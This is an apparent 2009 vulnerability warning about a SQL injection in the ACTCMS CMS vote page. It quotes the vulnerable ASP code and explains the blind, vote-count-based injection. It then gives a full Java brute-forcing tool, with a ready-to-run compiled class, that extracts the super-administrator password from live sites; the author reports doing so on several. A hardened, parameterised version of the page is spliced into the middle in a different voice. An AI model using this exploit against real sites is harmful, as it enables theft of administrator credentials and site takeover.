ACTCMS injection vulnerability-vulnerability warning-the black bar safety net

2009-12-31T00:00:00
ID MYHACK58:62200925775
Type myhack58
Reporter Anonymous
Modified 2009-12-31T00:00:00

Description

An ASP-based CMS. Not many people use it; Googling the keyword "Copyright @ 2006 www.actcms.com" does not turn up many sites.

Today I looked at the code. Practically every parameter is filtered, but the vote module has a small problem.

In the /plus/vote/vote.asp page, the code is as follows:

ASP/Visual Basic code

....
if request("voted").count=0 then
    response.write "<script>alert('please select a voting item.'); window.close()</script>"
    response.end
end if
for i=1 to request("voted").count
    actcms.actexe("Update vote_act set VoteNum=VoteNum+1 where id="&request("voted")(i))
next
....
response.Redirect "index.asp?id="&id&""

The id in the WHERE clause is taken straight from the request and concatenated into the UPDATE. But because the statement is an UPDATE and is immediately followed by response.Redirect, it is awkward to exploit, and general-purpose tools cannot recognise the injection point: whatever statement we append, the page just redirects to index.asp.
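For comparison, here is a hardened version of the same vote.asp logic. This is an added example written for this page, not ACTCMS's own code: it keeps the page's behaviour (the alert when nothing is selected, one increment per voted id, the redirect) but validates every id as a plain integer and binds it as an ADODB parameter instead of concatenating it into SQL. It assumes a hypothetical Application("connStr") holding the connection string and a provider that accepts "?" placeholders (Jet and SQL Server do); the IsPlainInt helper is also an assumption of this example.

```asp
<%
' Added example, not ACTCMS's own code: vote.asp rewritten so that neither
' the voted ids nor the redirect id can carry SQL or anything else.
' Assumes the connection string lives in a hypothetical Application("connStr")
' and that the database provider accepts "?" placeholders.
Option Explicit

' True only for a short string of plain digits: rejects "3 and ...", "1e5", "&H10"
Function IsPlainInt(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    IsPlainInt = re.Test(s)
End Function

Dim id, i, voteId, conn, cmd

' The redirect target is validated the same way, so user input never rides
' back out in the Location header
id = Request("id")
If Not IsPlainInt(id) Then
    Response.Status = "400 Bad Request"
    Response.Write "invalid id"
    Response.End
End If

If Request("voted").Count = 0 Then
    Response.Write "<script>alert('please select a voting item.'); window.close()</script>"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("connStr")

' One prepared UPDATE; the id is bound as an integer parameter, never concatenated
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = 1   ' adCmdText
cmd.CommandText = "UPDATE vote_act SET VoteNum = VoteNum + 1 WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1)   ' adInteger, adParamInput

For i = 1 To Request("voted").Count
    voteId = Request("voted")(i)
    If IsPlainInt(voteId) Then
        cmd.Parameters("id").Value = CLng(voteId)
        cmd.Execute
    Else
        ' A non-numeric voted value is exactly what the injection above looks like:
        ' record it in the IIS log and skip it rather than executing anything
        Response.AppendToLog "vote.asp rejected voted=" & voteId
    End If
Next

conn.Close
Set cmd = Nothing
Set conn = Nothing

Response.Redirect "index.asp?id=" & id
%>
```

The regex check rather than IsNumeric matters: IsNumeric accepts forms such as "1e5" or "&H10", and the whole point of the original bug is that anything after the digits reaches the database. With the value bound as adInteger, a trailing " and (select ...)" can no longer change the query, so the vote count stops acting as a one-bit oracle; the AppendToLog line also gives defenders a log signature to alert on.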

The only observable change is that when the injected condition is true, the vote count increases. Doing this by hand is quite tedious, and the injection tools I tried (Mingxiaozi, Pangolin and the like) could not inject it either, so I wrote a simple program myself; since I only know Java, it is written in Java. It is rough: it uses brute force over every character because that was easier to write. Slow is slow.

The code is as follows:

Java code

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class ActCmsGetPwd {
    // candidate characters tried at each password position
    public static char[] arr = { '0', '1', '2', '3', '4', '5', '6', '7', '8',
            '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
            'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y',
            'z' };

    public static String siteurl = "";
    public static int voteid = 1;
    public static String charset = "";

    public static void main(String[] args) throws Exception {
        if (args.length < 4) {
            System.out.println("usage:java ActCmsGetPwd <siteurl> <voteid> <totalVoteNum> <charset>");
            System.out.println("siteurl:the target site");
            System.out.println("voteid:vote id");
            System.out.println("totalVoteNum:the current voting numbers, please view plus/vote/index.asp?id=<voteid>");
            System.out.println("charset:the target site of the ACTCMS character set, please view the page source code");
            System.out.println("eg:java ActCmsGetPwd http://www.abc.com/ 1 15 gb2312");
            return;
        }
        siteurl = args[0];
        voteid = Integer.parseInt(args[1]);
        int preVoteNum = Integer.parseInt(args[2]);
        charset = args[3];

        System.out.println("Code by Ninty , QQ 3191864");
        System.out.print("password is :");
        // one position of the 16-character hash per iteration; each hit adds one vote
        for (int i = 1; i <= 16; i++) {
            System.out.print(send(i, 0, preVoteNum));
            preVoteNum++;
        }
        System.out.println("\nDone!");
    }

    public static char send(int a, int b, int preVoteNum) throws Exception {
        String sql = "%20and%20(select%20top%201%20mid(password," + a
                + ",1)%20from%20admin_act%20where%20supertf%20=1)%20=%20'" + arr[b] + "'";
        URL u = new URL(siteurl
                + "/Plus/vote/vote.asp?dopost=send&id=" + voteid + "&ismore=0&voted=3" + sql);
        URLConnection conn = u.openConnection();
        BufferedReader reader = new BufferedReader(new InputStreamReader(conn.getInputStream(), charset));
        String str = reader.readLine();
        // the redirect lands on index.asp; find the line that shows the vote count
        while (str != null) {
            if (str.indexOf("poll numbers:") != -1) {
                break;
            }
            str = reader.readLine();
        }
        reader.close();
        if (!isRight(str, preVoteNum)) {
            return send(a, ++b, preVoteNum);
        } else {
            return arr[b];
        }
    }

    // the guess was right only if the displayed count moved past the previous value
    public static boolean isRight(String str, int preVoteNum) {
        if (str == null) {
            System.out.println("cannot read!");
            System.exit(0);
        }
        Pattern pat = Pattern.compile(": (\\d+)");
        Matcher mat = pat.matcher(str);
        if (mat.find()) {
            int num = Integer.parseInt(mat.group(1));
            if (num != preVoteNum) {
                return true;
            }
        }
        return false;
    }
}

The following is the compiled class file, built with JDK6; just run it directly. actcmsgetpwd.class

I tested it on a few sites on the Internet and could obtain the super-administrator password, but the official website does not seem to have this vulnerability.